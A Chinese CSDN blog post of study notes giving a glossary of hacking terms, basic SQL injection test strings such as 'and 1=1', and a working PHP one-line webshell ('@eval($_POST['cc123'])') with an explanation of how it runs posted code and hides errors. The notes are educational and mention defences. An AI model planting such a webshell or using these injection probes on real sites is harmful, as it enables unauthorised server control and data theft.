黑客术语和一些SQL和一句话木马

本文介绍了黑客常用的术语,详细讲解了SQL注入技术,包括参数化查询和特殊字符处理的方法,并探讨了一句话木马的工作原理,强调其在Web服务器控制中的作用。
摘要由CSDN通过智能技术生成

 一、黑客术语

shell

执行系统命令的shell,常用是cmdshell,掌握cmd.exe基本的命令行
poc

渗透测试中比较重要的文档之一;proof of concept(概念证明):指一个证明漏洞真实性和存在性的测试代码,验证漏洞的存在。

*明确了解漏洞的原理

*熟练运用一门编程语言各个相关模块与机制

*熟练了解HTTP协议

*代码规范

*程序经过足够测试

*及时反馈进度

*更新相关文档

exp

渗透测试中比较重要的文档之一;

基于漏洞获取系统信息的攻击脚本;

漏洞利用,是一段可以利用一个漏洞的完整代码;

shellcode指发送到服务器利用特定漏洞的代码,一般可以用于获取权限。
渗透攻击者主动入侵目标系统并不断提升自己权限的行为
渗透测试模拟攻击者入侵的方法来评估计算机系统安全的行为,一种授权行为
跳板一个具有辅助作用的计算机系统,利用该计算机系统作为一个间接的平台攻击其他计算机。可以避免自己的信息泄露。
白名单为了允许用户提交正常数据而设置的。白名单内一般是允许提交的规则或数据。
黑名单

为了防止用户提交攻击数据而设置的。黑名单一般是禁止提交的规则和数据。

*但由于黑客技术的不断发展,黑名单是无法实时穷举所有的规则,所以很不安全;

*白名单相对来说,更加安全。

暴库攻击者攻击网站,通过提交攻击代码获取网站的敏感信息,如用户的个人信息等
脱库拖库,通过SQL注入漏洞等获取目标系统数据库的数据
洗库对脱库后的数据及逆行科学结构化的处理,进而提取出数据的利用价值
撞库将洗库后的数据(一般是账户和密码信息)代入其他系统进行登陆尝试。
脚本语言

为了缩短编写、编译、链接及运行过程诞生的计算机语言。

*即一种在运行时逐行解释并执行的代码语言,可以直接在计算机上运行。JS

解释型语言先翻译成【中间代码】,再由【解释器】对【中间代码】进行解释执行,php
编译型语言将【源代码】编译生成【机器语言】再运行。c++
混合型语言既有编译过程又有解释过程,java
拿站获取一个网站的最高权限
提权权限提升,黑客通过某种方法获取目标上自己本没有的高权限
rootkit攻击者用于隐藏自己行踪与保留root访问权限的工具I
Internet外网
Intranet内网
端口

指计算机系统对外提供服务时所开放的访问通道,端口与服务是对应的;

*80端口对应HTTP服务

*22端口对应SHH协议服务

*27017端口对应Mongodb数据库

*6379端口对应redis数据库,支持修改范围是5000-9999

*https://blog.csdn.net/tycyj/article/details/110674409

嗅探窃听网络上流经的数据包
C段查询

(一个c类ip地址是指在ip地址的四段号码中,前三段号码为网络号码,剩下的一段号码为本地计算机的号码)

查询某个ip地址的c段信息

C段嗅探获取与原服务器在同一c段的一个服务器,然后使用嗅探工具嗅探并最终获得原服务器
IDS入侵检测系统
IPS入侵防御系统
WAFweb应用防火墙

二、一些SQL注入

数字型SQL注入

构造的输入值为整数型,则为数字型SQL注入,数字型不用单引号来闭合原语言;

demo:and 1=1及and 1=2

字符型SQL注入

构造的输入值为字符型;字符型需要单引号来闭合原语言;

demo:'and'abc'='abc及'and'abc'='acb

搜索型SQL注入

构造的输入值为文本型,搜索型需要单引号来闭合原语言;

demo:%'and 1=1 and '%'='及%'and 1=2'%'='

*参数化查询

*特殊字符处理

三、一句话木马

**通常是使用一句话木马对目标Web服务器进行控制,以便日后可随时管理目标Web服务器。

https://mp.weixin.qq.com/s/Ra1t8zBUdysBk_43_HDC8w

<?php eval($_POST[cc123])?>

<?php @eval($_POST['cc123']);?>

https://www.php.net/manual/zh/function.eval.php

*eval:把字符串作为PHP代码执行

*demo中把$_POST[cc123]或$_POST['cc123']作为php代码执行

*eval:运行执行任意php代码

*tips:不要允许传入任何由用户提供的、未经完整验证的数据

https://xz.aliyun.com/t/6957

第二句的工作原理:

@是为了屏蔽错误,增加其隐蔽性;

1、存在一个名为cc123的变量,cc123的取值为HTTP的POST方式;

2、web服务器对shell取值后,通过eval()函数执行cc123里面的内容;

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值